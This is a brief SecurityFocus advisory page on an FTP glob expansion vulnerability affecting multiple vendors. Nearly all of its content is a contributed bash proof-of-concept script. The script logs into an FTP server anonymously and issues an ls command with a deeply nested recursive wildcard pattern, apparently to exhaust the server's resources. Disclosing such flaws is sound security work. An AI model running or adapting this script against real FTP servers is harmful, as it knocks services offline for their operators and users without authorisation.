Multiple Vendor FTP glob Expansion Vulnerability

Contributed by Enrico Kern <IphantomI@web.de>:

#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20


 

Privacy Statement
Copyright 2010, SecurityFocus